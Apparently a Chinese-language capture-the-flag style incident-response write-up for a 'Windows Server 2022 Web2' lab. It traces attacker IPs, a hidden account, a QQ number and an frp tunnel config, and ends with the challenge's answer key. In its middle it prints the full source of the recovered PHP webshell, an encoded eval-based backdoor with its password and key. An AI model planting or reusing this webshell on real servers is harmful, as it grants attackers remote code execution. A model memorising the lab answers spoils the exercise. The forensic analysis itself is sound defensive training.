Windows Server 2022 Web2
载入靶机,看到相关描述:
进入虚拟机发现桌面有phpstudy和解题两个软件:
先点击“解题.exe”:
1.攻击者的IP地址(两个)?
2.攻击者的webshell文件名?
3.攻击者的webshell密码?
4.攻击者的QQ号?
5.攻击者的服务器伪IP地址?
6.攻击者的服务器端口?
7.攻击者是如何入侵的(选择题)?
8.攻击者的隐藏用户名?
还是先将蓝队应急响应工具箱”粘贴到winserver 2022中:
打开phpstudy找到web目录:
用“D盾”找到后门:
得知webshell文件名是:system.php,第二问解决
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='hack6618';
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
得知webshell密码是hack6618,要是看不懂可以让AI分析一下,第三问解决
查看Apache的日志文件:
得到攻击者IP地址:192.168.126.135,但还有一个IP地址没有发现
使用”Windows日志一键分析“:
2024-02-29 13:28:48 hack887$ WIN-RRCVI68HLRI 10 User32 WIN-RRCVI68HLRI C:\Windows\System32\svchost.exe 192.168.126.129 0 4624
得到攻击者隐藏用户名:hack887和另一个IP地址:192.168.126.129,第一问和第八问解决
QQ号通常和“Tencent Files”文件夹有关,上传everything,检索关键词“Tencent”:
找到QQ号:777888999321,第四问解决
在“FileRecv”文件夹(是接收文件的文件夹)内发现frp内网穿透工具:
在frpc,ini的配置文件中发现伪IP和端口:
伪IP:256.256.66.88,第五问解决
端口:65536,第六问解决
只剩下第七问(选择题)没有做了
1、192.168.126.135和192.168.126.129
2、system.php
3、hack6618
4、777888999321
5、256.256.66.88
6、65536
8、hack887
查看ftp服务日志内容:
可以看到system.php后门文件的上传记录,第七问答案:3,第七问解决
1、192.168.126.135和192.168.126.129
2、system.php
3、hack6618
4、777888999321
5、256.256.66.88
6、65536
7、3
8、hack887
(话说,为什么“解题.exe”没有让我回答webshell密码?)
成功攻克该靶机!